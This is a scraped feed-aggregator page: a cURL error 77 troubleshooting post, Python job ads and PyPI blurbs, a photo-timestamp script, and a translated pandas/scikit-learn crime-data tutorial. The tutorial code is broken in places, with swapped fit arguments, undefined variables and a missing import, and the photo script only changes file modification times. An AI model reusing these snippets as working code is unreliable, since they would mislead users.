Nov 6 16:01:45 mail kernel: [100284.043405] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:00:00:01:08:00 SRC=192.168.0.1 DST=224.0.0.1 LEN=36 TOS=0x00 PREC=0xC0 TTL=1 ID=64762 PROTO=2
Nov 6 16:01:45 mail kernel: [100284.928461] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:00:00:fb:a:82:08:00 SRC=192.168.0.21 DST=224.0.0.251 LEN=32 TOS=0x00 PREC=0x00 TTL=1 ID=31570 PROTO=2
Nov 6 16:02:01 mail CRON[99510]: (root) CMD (python /opt/iredapd/tools/spf_to_greylist_whitelists.py >/dev/null)
Nov 6 16:02:01 mail CRON[99511]: (root) CMD (python /opt/iredapd/tools/spf_to_greylist_whitelists.py >/dev/null)

and maybe tell me what I might look at that could be the problem? I can send other logs too if needed. Thanks again!
          cURL error 77 with PHP-FPM after yum update      Cache   Translate Page      

Recently a client reported that checkout was broken on their ecommerce website.

After some quick investigation, I found that the application code responsible for speaking with the payment gateway was logging the following error:

CURL Connection error: (77)

Here, I’ll outline my approach to solving this problem.

Hitting the Payment Gateway’s endpoint using the curl Executable

The site was using Authorize.NET as its payment gateway. The code was specifically hitting an endpoint at https://api2.authorize.net. I tried hitting the endpoint myself using the curl executable while SSH-ed into one of their web servers to see if the issue would reproduce…

$ curl https://api2.authorize.net/xml/v1/request.api
{"messages":{"resultCode":"Error","message":[{"code":"E00003","text":"Root element is missing."}]}}

No cURL error 77…the problem did not seem to reproduce…

Invoking cURL through PHP-FPM

The application code, of course, wasn’t running curl via command line invocation of the curl executable. Instead, a PHP-FPM process was executing a script that was using PHP cURL functions .

As such, I decided to test that way. I quickly created a testing script…

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://api2.authorize.net");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
var_dump($output);
var_dump(curl_error($ch));
var_dump(curl_errno($ch));

I put it in the webroot of the server I was SSH-ed into and ran it via a PHP-FPM process as follows:

$ curl --resolve www.example.com:80:127.0.0.1 http://www.example.com/mpc-curl-auth-net-test.php
bool(false)
string(0) ""
int(77)

Bingo, I got the error.

What Had Changed Recently?

This reminded me of an issue I had seen not long ago where DNS lookups failed only when running curl via a script executed by PHP-FPM. In that case I had tracked it back to a yum update.

As such, I decided to check /var/log/yum.log to see if any packages had been updated recently…

Oct 24 03:53:38 Updated: nspr.x86_64 4.19.0-1.43.amzn1
Oct 24 03:53:39 Updated: nss-util.x86_64 3.36.0-1.54.amzn1
Oct 24 03:53:39 Updated: nss-softokn-freebl.x86_64 3.36.0-5.42.amzn1
Oct 24 03:53:39 Updated: nss-softokn.x86_64 3.36.0-5.42.amzn1
Oct 24 03:53:39 Updated: nss-sysinit.x86_64 3.36.0-5.82.amzn1
Oct 24 03:53:39 Updated: nss.x86_64 3.36.0-5.82.amzn1
Oct 24 03:53:39 Updated: nss-tools.x86_64 3.36.0-5.82.amzn1
Oct 24 03:53:39 Updated: python26-paramiko.noarch 1.15.1-2.7.amzn1
Oct 24 03:53:39 Updated: python27-paramiko.noarch 1.15.1-2.7.amzn1

Bingo again! A yum update had run the night before…

The Fix

Going off my experience with the DNS issue, I guessed that restarting php-fpm might fix the issue. As such, I decided to give it a try…

$ sudo service php-fpm restart

Then, I re-ran my testing script

$ curl --resolve www.example.com:80:127.0.0.1 http://www.example.com/mpc-curl-auth-net-test.php
string(1233) "<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
... "
string(0) ""
int(0)

Issue resolved.

The Return Of The Issue

This project was running a fleet of AWS EC2 instances, and we manually restarted php-fpm across all of them. However, later that same day the client reported that the issue had reared its ugly head again. This time, however, it was only occurring sporadically.

Digging in, I found this was due to a fresh EC2 instance being introduced into the auto scaling group.

What was happening was…

1. Instance comes online with old NSS packages
2. PHP-FPM starts
3. yum update runs
4. Bad times

In order to fix this we baked a new AMI with the NSS packages already updated. Now, when a new EC2 instance came online this would happen…

1. Instance comes online with new NSS packages
2. PHP-FPM starts
The True Root Cause

While I would love to know exactly why updating those packages caused the error when running curl via PHP-FPM, unfortunately I didn't have the opportunity to truly get to the bottom of it. If you've run into this same issue and went deeper on it than I did, I'd love to hear about it in the comments below…


          Junior to Mid DevOps - Python      Cache   Translate Page      
MN-Minneapolis, job summary: Acts as a lead in providing application design guidance and consultation, utilizing a thorough understanding of applicable technology, tools and existing designs. Analyzes highly complex business requirements, designs and writes technical specifications to design or redesign complex computer platforms and applications. Provides coding direction to less experienced staff or develops hi
          CLIVO APIs and webhooks      Cache   Translate Page      
In this time we have a challenge for a sprint to get done and we require a freelance for the backend part, basically, we need APIs and webhooks, I send the details attached I hope if you find our startup... (Budget: $250 - $750 USD, Jobs: API, Django, Python, Software Architecture)
          Need to hire a systems engineer / devops for ongoing work in Manila (BGC)      Cache   Translate Page      
Hi there, I am looking for a talented systems engineer to work effectively full-time in Manila (Bonifacio Global City). Looking for both senior engineering as well as top graduate from a university like UP Diliman... (Budget: $8 - $15 USD, Jobs: C# Programming, General Labor, Javascript, Linux, node.js, PHP, Puppet, Python, Software Architecture)
          A study aid using Python and PyQt      Cache   Translate Page      
About a year ago, I took a course in Arabic. In addition to being a right-to-left written language, Arabic has its own alphabet. Since this was an introductory class, I spent most of my time working my way through the Arabic alphabet. So I decided to create a study aid: It would present an Arabic letter, I would formulate a guess, and it would tell me whether or not I had answered correctly. Some brief experimentation, however, showed that this approach would not work—the letters appeared so small that I couldn't be sure what I was seeing on the command line.
          Machine learning Python hacks, creepy Linux commands, Thelio, Podman, and more      Cache   Translate Page      
I'm filling in again for this week's top 10 while Rikki Endsley is recovering from LISA 18 held last week in Nashville, Tennessee. We're starting to gather articles for our 4th annual Open Source Yearbook; get your proposals in soon. Enjoy this week's top 10.
          homeassistant-pyozw added to PyPI      Cache   Translate Page      
python_openzwave is a python wrapper for the openzwave c++ library.
          pycopula added to PyPI      Cache   Translate Page      
Python copulas library for dependency modeling
          Head of DevOps - FinTech - Baltics - Relocation paid!      Cache   Translate Page      
Head of DevOps - FinTech - Baltics - Relocation paid! - Sonstiges

A very exciting opportunity has come about for a world class Head of DevOps to join a disruptive FinTech organisation, formed by a recent merger and making them one of the largest in the Baltics. Their ambition is to create a new generation bank to serve entrepreneurial people and local companies in the Baltics.

The successful Head of DevOps will be a seasoned professional with international experience, and responsible for architecting and building the entire CI/CD pipeline from scratch, and working closely with numerous Scrum teams to get things in place for initial releases early next year.

This role is unique in the sense that you will have a blank canvas, and the deciding say on what technologies are used to get this exciting greenfield project into production. You will be technically 'hands-on', with in-depth experience as a DevOps specialist as well as proven leadership and management skills.

Essential skills

  • Passionate about DevOps, Agile, and installing DevOps culture
  • Solid experience building a delivery pipeline from the ground up
  • Strong experience setting up and configuring CI tools - Jenkins, Bamboo
  • Strong experience with multiple environments, Cloud and on-prem
  • Setting up Source Code Repositories - BitBucket, Git, SVN
  • Strong Scripting skills - Python, Bash, Ruby
  • Strong knowledge of configuration tech - Puppet, Ansible, Chef
  • Good understanding of Containerisation - Docker, Kubernetes
  • Innovative, creative, and curious mindset, with ability to inspire others
  • Excellent communicator with strong leadership skills
  • Excited about travelling across the Baltics

Desirable

  • Financial Services experience
  • Exposure to tools such as Jira and Confluence
  • Experience working with Architecture and API integration teams to continuously improve architectural design

Awesome opportunity to really put your stamp on something big and very innovative, so please get in touch ASAP to be considered.

    Company: Cloudstream
    Job type: Other
    Salary: EUR 150,000 / year

          Running Java on Azure      Cache   Translate Page      
Azure is Microsoft's cloud platform. It is the home of Service Apps, Logic Apps, cloud storage, Kubernetes Service and provides the foundation for VSTS (now Azure DevOps), Office 365 and loads of other services and tools. But not only for .NET based services and applications. Today's Microsoft provides options for Linux developers, OSX teams, Docker containers, Python code, Node.js and
          Jr. Electrical Engineer      Cache   Translate Page      
CA-San Francisco, JOB DESCRIPTION: * Support the EE and Firmware teams in the lab with testing and rework * Develop automation tests with Python and/or Labview o Test plans will be given as they will have to manually or automated depending on test plans * Collaborate closely with and engineers * Leadership potential / future career growth possibility * Coordinate with external PCB fabrication houses as needed o DFM
          Jr. Electrical Engineer      Cache   Translate Page      
CA-San Francisco, JOB DESCRIPTION: * Support the EE and Firmware teams in the lab with testing and rework * Develop automation tests with Python and/or LabView o Test plans will be given as they will have to manually or automated depending on test plans * Collaborate closely with and engineers * Leadership potential / future career growth possibility * Coordinate with external PCB fabrication houses as needed o Des
          Python or JavaScript Developer - Odoo - Grand-Rosière-Hottomont      Cache   Translate Page      
Join our smart team of Python and JavaScript developers, and work on an amazing Open Source product. Develop things people care about. About the company Odoo is a suite of business apps that covers all enterprise management needs: CRM, e-Commerce, Accounting, Project Management, Inventory, POS, etc. We disrupt the enterprise software market by making fully open source, super easy and full featured (3000+ apps) software accessible to SMEs at a very low cost. Responsibilities Develop Apps...
          pystrin 0.0.2      Cache   Translate Page      
A small Python package used for string interpolation
          drucker 0.4.0      Cache   Translate Page      
A Python gRPC framework for serving a machine learning module written in Python.
          pystrin 0.0.1      Cache   Translate Page      
A small Python package used for string interpolation
          solr-dsl 0.0.15      Cache   Translate Page      
Python client for Solr
          solr-dsl 0.0.14      Cache   Translate Page      
Python client for Solr
          dulwich 0.19.8      Cache   Translate Page      
Python Git Library
          tesp_support 0.1.5      Cache   Translate Page      
Python support for the Transactive Energy Simulation Platform
          ava-engine 0.11.2rc6      Cache   Translate Page      
Official Ava Engine Python SDK.
          qiita_v2 0.2.1      Cache   Translate Page      
Python Wrapper for Qiita API v2
          #7: Learning Python: Powerful Object-Oriented Programming      Cache   Translate Page      
Learning Python
Learning Python: Powerful Object-Oriented Programming
Mark Lutz
(29)

Buy new: CDN$ 84.05 CDN$ 53.38
46 used & new from CDN$ 48.05

(Visit the Bestsellers in Web Development list for authoritative information on this product's current rank.)
          Software Development Engineer, Big Data - Zillow Group - Seattle, WA      Cache   Translate Page      
Experience with Hive, Spark, Presto, Airflow and or Python a plus. About the team....
From Zillow Group - Thu, 01 Nov 2018 11:21:23 GMT - View all Seattle, WA jobs
          Data Scientist - Zillow Group - Seattle, WA      Cache   Translate Page      
Dive into Zillow's internal and third party data (think Hive, Presto, SQL Server, Redshift, Python, Mode Analytics, Tableau, R) to uncover real estate trends...
From Zillow Group - Thu, 01 Nov 2018 11:21:23 GMT - View all Seattle, WA jobs
          Data Scientist (Agent Pricing) - Zillow Group - Seattle, WA      Cache   Translate Page      
Dive into Zillow's internal and third-party data (think Hive, Presto, SQL Server, Python, Mode Analytics, Tableau, R) to make strategic recommendations....
From Zillow Group - Thu, 01 Nov 2018 11:21:14 GMT - View all Seattle, WA jobs
          Data Visualization Engineer (Zillow Offers) - Zillow Group - Seattle, WA      Cache   Translate Page      
Dive into Zillow's internal and third party data (think Hive, Presto, SQL Server, Python, R, Tableau) to develop solutions that will help move the business...
From Zillow Group - Thu, 01 Nov 2018 11:21:14 GMT - View all Seattle, WA jobs
          Data Scientist - Vertical Living - Zillow Group - Seattle, WA      Cache   Translate Page      
Dive into Zillow's internal and third party data (think Hive, Presto, SQL Server, Redshift, Python, Mode Analytics, Tableau, R) to make strategic...
From Zillow Group - Thu, 01 Nov 2018 11:21:13 GMT - View all Seattle, WA jobs
          17.8.1979: Monty Python's "Life of Brian" ("Das Leben des Brian") premieres      Cache   Translate Page      
none
          Back-end Django / Python Programmer – 1 Opening RJ      Cache   Translate Page      
Openings in: 1 opening – Rio de Janeiro – RJ (1) To see the details of the opening and apply, click here. If you cannot access it, copy and paste this URL into your browser: https://emprego.net/jobs/5be1d49b0a4181469d2bef38 emprego.net – where candidates and Read more...
          Ultimate Programmer Super Stack Bundle      Cache   Translate Page      

I'm pleased to share that my PHP 7 Upgrade Guide ebook has been featured in the Ultimate Programmer Super Stack bundle! This is a hand-curated collection of 25+ premium ecourses, bestselling ebooks, and bonus resources that will help new programmers:

  • Learn a wide range of today’s most popular (and lucrative) languages and frameworks, including everything from Python, JavaScript, and Ruby, to HTML, CSS, and Kotlin, and more…
  • Discover how to build APIs, websites, and iOS and Android applications from scratch
  • Uncover the 'Business of Software' (how computer programs work, how computer programmers think, and how to start your very own computer programming business)
  • Master the soft skills you need to become 'Coder Complete' (this stuff will have a huge impact on your career, believe me)

And much more.

Typically, you’d have to spend over $600+ to get your hands on everything packed inside this Stack… But this week, you can get everything for over 95% off.

Not only does it include my ebook, but it also includes things like Phil Sturgeon's "Build APIs You Won't Hate" book (retail value: $26.99) and Spencer Carli's "Production Ready React Native" e-course (retail value: $67.00). You can check out the full list of courses, ebooks, and resources here.

While I'm not interested in spamming you with irrelevant ads, as a reader of my blog I do think you'd find this bundle to be a great value, and some of the proceeds go towards supporting my open-source work in the community, so I think it's a win-win!

Claim this deal before it runs out!


          Source code for an MVP-pattern comics app based on RxJava + Retrofit2 + Glide + ButterKnife      Cache   Translate Page      
The project is based on RxJava + Retrofit2 + Glide + ButterKnife and is developed with the MVP pattern. The API is provided by a Python project written by the author; its source code is not provided for now. This project is purely for learning and exchange; the data was obtained through unofficial channels and must not be used for commercial purposes. Technical points: RxJava is used together with Retrofit for network requests; the whole project uses the MVP architecture, with corresponding model, view, presen ...
          Java architect learning roadmap: point 6 is especially important!      Cache   Translate Page      
For web applications, the most common development languages are Java and PHP. For back-end services, the most common are Java and C/C++. For big data, the most common are Java and Python. It is fair to say that Java is currently the development language with the broadest coverage among Chinese internet companies. If you master the Java technology stack, then whether at a mature large company, a fast-growing company, or a startup-stage ...
          23 core pandas operations: do you need to go through them?      Cache   Translate Page      
Pandas is a Python library that provides a large number of functions and methods for processing data quickly and conveniently. Generally speaking, pandas is one of the important factors that make Python a powerful and efficient data analysis environment. In this article, the author demonstrates 23 core pandas methods from three angles: basic dataset reading and writing, data processing, and DataFrame operations. Pandas is built on N ...
          today's howtos      Cache   Translate Page      

          finish my Cloud Scrapper / Upload Tool      Cache   Translate Page      
I am looking for someone who finishes my tool. It scans my cloud account and writes the data into a database. To get the data from these accounts offline. Without using the Website. Part of the program is already finished and should now be finished... (Budget: $30 - $250 USD, Jobs: API, Python, SQLite, Web Scraping)
          Fixing photo dates with Python      Cache   Translate Page      

Last week I took part in the "2018 Northern Taiwan IoT Investment and Cooperation Business Delegation" organized by WTIA, bringing a camera and a phone to photograph the event. Back in Hong Kong, I discovered that the camera's clock had been set one hour fast during an August trip to Nagoya, so I wrote the following Python program to read the EXIF data in the photos and shift the date of every photo taken with a Canon back by one hour to the correct time.
##----------------------------------------------------------------------------------------
## Fix Photo Creation Date
##----------------------------------------------------------------------------------------
## Platform: macOS Mojave + Python 3
## Copyrights Pacess Studio, 2018. All rights reserved.
##----------------------------------------------------------------------------------------

import os
import time
import exifread  # third-party: pip install exifread

##----------------------------------------------------------------------------------------
## Global variables
_path = "./"

##----------------------------------------------------------------------------------------
## Get files from directory
for root, dirs, files in os.walk(_path):

   for file in files:
   
      if file.startswith("."):
         continue

      if not file.endswith(".JPG"):
         continue

      print("\nProcessing "+file+"...", end="")

      ##----------------------------------------------------------------------------------------
      ## Get EXIF
      handle = open(_path+file, "rb")
      tags = exifread.process_file(handle)
   
      machine = str(tags["Image Make"])
      print(machine, end="")

      ## Process only if "Canon"
      if "Canon" not in machine:
         continue

      ##----------------------------------------------------------------------------------------
      ## Subtract one hour
      #datetime = os.path.getmtime(file)
      #timeString = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(datetime))
      timeString = str(tags["Image DateTime"])
      datetime = time.mktime(time.strptime(timeString, "%Y:%m:%d %H:%M:%S"))

      newDatetime = datetime-(60*60)
      newTimeString = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(newDatetime))
      
      os.utime(_path+file, (newDatetime, newDatetime))
      print(" ("+timeString+" => GMT:"+newTimeString+")", end="")

print("\nDone\n")
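The essential step, shifting an EXIF timestamp by one hour, can also be sketched on its own (the function name is mine, not part of the script above; EXIF stores timestamps as "YYYY:MM:DD HH:MM:SS"):

```python
import time

def shift_exif_time(exif_time, hours=-1):
    # Parse the EXIF-style timestamp, shift it by whole hours,
    # and format it back in the same EXIF style.
    t = time.mktime(time.strptime(exif_time, "%Y:%m:%d %H:%M:%S"))
    return time.strftime("%Y:%m:%d %H:%M:%S", time.localtime(t + hours * 3600))

shift_exif_time("2018:08:15 10:30:00")  # one hour earlier
```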

          Jr. Electrical Engineer      Cache   Translate Page      
CA-San Francisco, JOB DESCRIPTION: * Support the EE and Firmware teams in the lab with testing and rework * Develop automation tests with Python and/or Labview o Test plans will be given as they will have to manually or automated depending on test plans * Collaborate closely with and engineers * Leadership potential / future career growth possibility * Coordinate with external PCB fabrication houses as needed o DFM
          Jr. Electrical Engineer      Cache   Translate Page      
CA-San Francisco, JOB DESCRIPTION: * Support the EE and Firmware teams in the lab with testing and rework * Develop automation tests with Python and/or LabView o Test plans will be given as they will have to manually or automated depending on test plans * Collaborate closely with and engineers * Leadership potential / future career growth possibility * Coordinate with external PCB fabrication houses as needed o Des
          The complete JavaScript handbook      Cache   Translate Page      
JavaScript is one of the most popular programming languages in the world, and is now widely used also outside of the browser. The rise of Node.js in the last few years unlocked back-end development – once the domain of Java, Ruby, Python, PHP, and more traditional server-side languages.
          Software Engineer - BackEnd - Fetchr - Dubai      Cache   Translate Page      
Extensive experience programming in Python, Java, Go, Scala and/or C, C++. Participate in all aspects of developing and designing new and innovative...
From Akhtaboot - Mon, 15 Oct 2018 10:31:43 GMT - View all Dubai jobs
          Senior Software Engineer - Fetchr - Dubai      Cache   Translate Page      
Extensive experience programming in Python, Java, Go, Scala and/or C, C++. Design and develop software and algorithms to solve business problems and challenges...
From Akhtaboot - Mon, 15 Oct 2018 10:31:47 GMT - View all Dubai jobs
          OEB-656 - [V-991] Junior Python/Django Programmer - Capital Federal Area in Buenos Aires C.F. (ML.029) in Buenos Aires C.F      Cache   Translate Page      
Buenos Aires - A major company dedicated to the import, sale and distribution of electronic security, networking and communications equipment... is looking for FEMALE FORKLIFT (CLARK) OPERATORS (female applicants only) to add to its work teams. Main tasks: loading and unloading [...] 06 Nov | Complement Group (holding...
          Python Developer – 1 Opening – Rio de Janeiro – RJ      Cache   Translate Page      
Openings in: 1 opening – Rio de Janeiro – RJ (1) To see the details of the opening and apply, click here. If you cannot access it, copy and paste this URL into your browser: https://emprego.net/jobs/5be03e4f0a4181469d2bb1ac emprego.net – where candidates and Read more...
          awscli (1.16.48)      Cache   Translate Page      
The AWS CLI is an open source tool built on top of the AWS SDK for Python (Boto) that provides commands for interacting with AWS services.

          Python Developer      Cache   Translate Page      
PA-Philadelphia, Job Title: Python Developer Location: Philadelphia, PA Duration: Either Contract or Contract To Hire or Full Time Description: As a Python Developer, you will be a part of a team of developers delivering in an Agile environment. Responsible for utilizing best practices in order to ensure high quality software solutions. The ideal candidate for this job should have strong experience in PYTHON devel
          Electrical Engineer/Systems Engineer - Kroenke Sports Enterprises - Fort Worth, TX      Cache   Translate Page      
Computer languages, supporting several microcontroller languages including (machine code, Arduino, .NET, ATMEL, Python, PASCAL, C++, Ladder, Function Block)....
From Kroenke Sports Enterprises - Sat, 13 Oct 2018 18:16:18 GMT - View all Fort Worth, TX jobs
          Getting started with data science using Python      Cache   Translate Page      

You don't need expensive tools to tap the power of data science; these open source tools are all you need to get started.

Whether you are a veteran data science enthusiast with a background in mathematics or computer science, or an expert in another field, the possibilities data science offers are within your reach, and you don't need expensive, highly specialized enterprise software. The open source tools discussed in this article are all you need to get started.

Python, its machine learning and data science libraries (pandas, Keras, TensorFlow, scikit-learn, SciPy, NumPy, etc.), and its many visualization libraries (Matplotlib, pyplot, Plotly, etc.) are excellent free and open source tools for beginners and experts alike. They are easy to learn, popular and community-supported, and come with the latest techniques and algorithms developed for data science. They are one of the best tool sets you can get when starting out.

Many Python libraries are built on top of each other (known as dependencies), and the foundation is the NumPy library. Designed specifically for data science, NumPy is often used to store the relevant parts of a dataset in its ndarray data type. ndarray is a convenient data type for storing records from a relational table as a CSV file or any other format, and vice versa. It is particularly convenient when applying scikit functions to multidimensional arrays. SQL is great for querying databases, but for complex and resource-intensive data science operations, storing the data in an ndarray improves efficiency and speed (just make sure you have enough RAM when working with large datasets). When you use pandas for knowledge extraction and analysis, the seamless conversion between pandas' DataFrame data type and NumPy's ndarray creates a powerful combination for extraction and compute-intensive operations, respectively.

As a quick demonstration, let's start the Python shell, load an open dataset of crime statistics from the city of Baltimore into a pandas DataFrame variable, and view a portion of the loaded DataFrame:

>>> import pandas as pd
>>> crime_stats = pd.read_csv('BPD_Arrests.csv')
>>> crime_stats.head()

We can now perform most queries on this pandas DataFrame, just as we can with SQL on a database. For example, to get all unique values of the Description attribute, the SQL query is:

$ SELECT unique("Description") from crime_stats;
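Standard SQL spells this operation `SELECT DISTINCT`; it can be tried with Python's built-in sqlite3 module against a small stand-in table (the actual Baltimore database is not bundled with the article, so the sample rows here are made up):

```python
import sqlite3

# A tiny in-memory stand-in for the crime_stats table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE crime_stats (Description TEXT)")
conn.executemany("INSERT INTO crime_stats VALUES (?)",
                 [("LARCENY",), ("HOMICIDE",), ("LARCENY",)])

# DISTINCT collapses the duplicate 'LARCENY' row.
rows = conn.execute('SELECT DISTINCT "Description" FROM crime_stats').fetchall()
print(rows)
```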

Writing the same query against the pandas DataFrame looks like this:

>>> crime_stats['Description'].unique()
['COMMON ASSAULT' 'LARCENY' 'ROBBERY - STREET' 'AGG. ASSAULT'
 'LARCENY FROM AUTO' 'HOMICIDE' 'BURGLARY' 'AUTO THEFT'
 'ROBBERY - RESIDENCE' 'ROBBERY - COMMERCIAL' 'ROBBERY - CARJACKING'
 'ASSAULT BY THREAT' 'SHOOTING' 'RAPE' 'ARSON']

which returns a NumPy array (of type ndarray):

>>> type(crime_stats['Description'].unique())
<class 'numpy.ndarray'>

Next, let's feed this data into a neural network and see how accurately it can predict the type of weapon used, given data that includes the crime incident, the type of crime, and where it happened:

>>> from sklearn.neural_network import MLPClassifier
>>> import numpy as np
>>>
>>> prediction = crime_stats[['Weapon']]
>>> predictors = crime_stats[['CrimeTime', 'CrimeCode', 'Neighborhood']]
>>>
>>> nn_model = MLPClassifier(solver='lbfgs', alpha=1e-5,
...                          hidden_layer_sizes=(5, 2), random_state=1)
>>>
>>> predict_weapon = nn_model.fit(prediction, predictors)

Now that the learning model is ready, we can perform some tests to determine its quality and reliability. For starters, let's feed it the training set data (the portion of the original dataset that was held out when creating the model):

>>> predict_weapon.predict(training_set_weapons)
array([4, 4, 4, ..., 0, 4, 4])

As you can see, it returns a list, with each number predicting the weapon for each of the records in the training set. We see numbers rather than weapon names because most classification algorithms are optimized with numerical data. For categorical data, there are techniques to convert attributes into numerical representations. In this case, the technique used is label encoding, via the LabelEncoder function in the sklearn preprocessing library: preprocessing.LabelEncoder(). It can transform categorical data into its corresponding numerical representation and back again. In this example, we can use the inverse_transform function of LabelEncoder() to see what weapons 0 and 4 are:

>>> preprocessing.LabelEncoder().inverse_transform(encoded_weapons)
array(['HANDS', 'FIREARM', 'HANDS', ..., 'FIREARM', 'FIREARM', 'FIREARM'])
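The idea behind label encoding can be sketched without sklearn at all. A hypothetical two-way mapping in plain Python behaves like transform and inverse_transform (the category list here is made up):

```python
# A minimal sketch of label encoding, which sklearn's LabelEncoder automates.
weapons = ['FIREARM', 'HANDS', 'KNIFE']

# transform: category -> integer label (sorted order, like LabelEncoder)
classes = sorted(set(weapons))
to_label = {w: i for i, w in enumerate(classes)}

encoded = [to_label[w] for w in ['HANDS', 'FIREARM', 'KNIFE']]
print(encoded)    # [1, 0, 2]

# inverse_transform: integer label -> category
decoded = [classes[i] for i in encoded]
print(decoded)    # ['HANDS', 'FIREARM', 'KNIFE']
```

Classifiers work on the integer labels; the mapping is kept around so results can be turned back into readable categories afterwards.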

This is fun, but to get a sense of how accurate our model is, let's compute several scores as percentages:

>>> nn_model.score(X, y)
0.81999999999999995

This shows our neural network model is ~82% accurate. That result may seem impressive, but it is important to check its effectiveness when used on a different crime dataset. There are other tests to do this, such as correlations and confusion matrices. Although our model has high accuracy, it is not very useful for general crime datasets, because this particular dataset has a disproportionate number of rows that list FIREARM as the weapon used. Unless it is retrained, our classifier is most likely to predict FIREARM, even if the input dataset has a different distribution.

It is important to clean the data and remove outliers and anomalies before we classify it. The better the preprocessing, the better the accuracy of our insights. Also, feeding the model or classifier too much data (generally above 90%) to get higher accuracy is a bad idea, because it looks accurate but isn't useful due to overfitting.
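The value of holding data out can be sketched with a toy example in plain Python (no real dataset here; a trivial majority-class "classifier" stands in for the model, and the class imbalance mirrors the FIREARM-dominated column above):

```python
import random

random.seed(0)

# Toy labels: heavily imbalanced, like the FIREARM-dominated dataset
labels = ['FIREARM'] * 80 + ['HANDS'] * 20
random.shuffle(labels)

# Hold out 30% of the data for testing instead of training on everything
split = int(len(labels) * 0.7)
train, test = labels[:split], labels[split:]

# A trivial "model": always predict the most common training label
majority = max(set(train), key=train.count)
accuracy = sum(1 for y in test if y == majority) / len(test)

print(majority)
print(accuracy)
```

Measured on held-out data, this "model" scores exactly as well as the class imbalance allows and no better, which is the kind of effect an accuracy number computed on the training data alone would hide.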

Jupyter notebooks are a great interactive alternative to the command line. While the CLI is fine for most things, Jupyter shines when you want to run snippets to generate visualizations. It also formats data better than the terminal.

This article lists some of the best free resources for machine learning, but plenty of additional guides and tutorials are available. You will also find many open datasets to work with, depending on your interests and inclinations. As a starting point, the datasets maintained by Kaggle, as well as those available on state government websites, are excellent resources.


via: https://opensource.com/article/18/3/getting-started-data-science

Author: Payal Singh; Translator: MjSeven; Proofreader: wxy

This article was originally translated by LCTT and proudly presented by Linux中国 (Linux.cn)


          Eclipse Advanced Scripting Environment (EASE)      Cache   Translate Page      
Date Updated: 
Tue, 2018-11-06 08:59
Eclipse.org
Date Created: 
Mon, 2018-11-05 10:15

EASE is a scripting environment for Eclipse.

It allows you to create, maintain and execute script code in the context of the running Eclipse instance, so such scripts may manipulate and extend the IDE itself. Loadable script modules simplify the use of native Java objects and can be extended with application-specific methods.

Scripts can not only automate UI tasks, they can also be integrated into toolbars and menus dynamically. This makes it possible to customize the IDE with pure script code.

Various script engines are available, such as Rhino (JavaScript), Jython/Py4J (Python) and Groovy. The extensible framework allows any kind of language to be added; you could even embed your own command shell.


          Programming News      Cache   Translate Page      
  • Open Source Survey Shows Python Love, Security Pain Points

    ActiveState published results of a survey conducted to examine challenges faced by developers who work with open source runtimes, revealing love for Python and security pain points.

  • Study Finds Lukewarm Corporate Engagement With Open Source

    Companies expect developers to use open source tools at work, but few make substantial contributions in return

    Developers say that nearly three-quarters of their employers expect them to use open source software to do their jobs, but that those same companies’ contribution to the open source world is relatively low, with only 25 percent contributing more than $1,000 (£768) a year to open source projects.

    Only a small number of employers, 18 percent, contribute to open source foundations, and only 34 percent allow developers to use company time to make open source contributions, according to a new study.

    The study follows IBM’s announcement last week that it plans to buy Linux maker Red Hat for $34 billion (£26bn) in order to revitalise its growth in the cloud market, an indication of the importance of open source in the booming cloud industry.

    The report by cloud technology provider DigitalOcean, based on responses from more than 4,300 developers around the world, is the company’s fifth quarterly study on developer trends, with this edition focusing entirely on open source.

  • On learning Go and a comparison with Rust

    I spoke at the AKL Rust Meetup last month (slides) about my side project doing data mining in Rust. There were a number of engineers from Movio there who use Go, and I've been keen for a while to learn Go and compare it with Rust and Python for my data mining side projects, so that inspired me to knuckle down and learn Go.

    Go is super simple. I was able to learn the important points in a couple of evenings by reading GoByExample, and I very quickly had an implementation of the FPGrowth algorithm in Go up and running. For reference, I also have implementations of FPGrowth in Rust, Python, Java and C++.

  • anytime 0.3.2

    A new minor release of the anytime package arrived on CRAN this morning. This is the thirteenth release, and the first since July as the package has gotten feature-complete.

    anytime is a very focused package aiming to do just one thing really well: to convert anything in integer, numeric, character, factor, ordered, … format to either POSIXct or Date objects – and to do so without requiring a format string. See the anytime page, or the GitHub README.md for a few examples.

read more


          Delivery Project Lead - Mphasis - Bengaluru, Karnataka      Cache   Translate Page      
7+ years Application Development Proficiency in one or more general purpose programming languages – Python, Java, and PL/SQL Relational data modeling using...
From Mphasis - Tue, 06 Nov 2018 12:28:43 GMT - View all Bengaluru, Karnataka jobs
          Delv Senior Software Eng - Mphasis - Bengaluru, Karnataka      Cache   Translate Page      
5+ years Application Development Proficiency in one or more general purpose programming languages – Python , Java, and PL/SQL Relational data modeling using...
From Mphasis - Tue, 06 Nov 2018 12:28:41 GMT - View all Bengaluru, Karnataka jobs
          Software Engineer w/ Active DOD Secret Clearance (Contract) - Preferred Systems Solutions, Inc. - Cheyenne, WY      Cache   Translate Page      
Experience with Java, JavaScript, C#, PHP, Visual Basic, Python, HTML, XML, CSS, and AJAX. Experts Engaged in Delivering Their Best - This is the cornerstone of...
From Preferred Systems Solutions, Inc. - Tue, 25 Sep 2018 20:46:05 GMT - View all Cheyenne, WY jobs
          Geospatial Technical Principal - State of Wyoming - Cheyenne, WY      Cache   Translate Page      
Demonstrated skills in design of custom geospatial solutions, including use of the ArcGIS JavaScript API, Python and other appropriate resources.... $19.93 - $24.91 an hour
From State of Wyoming - Tue, 25 Sep 2018 02:50:28 GMT - View all Cheyenne, WY jobs
          Waf - The meta build system      Cache   Translate Page      
Waf is a Python-based framework for configuring, compiling and installing applications.

          Integrations Specialist - OnShift, Inc - Cleveland, OH      Cache   Translate Page      
Experience with Microsoft Server and Task Scheduler a plus. Advanced trouble shooting using SQL, Python, and advanced Excel is highly desired....
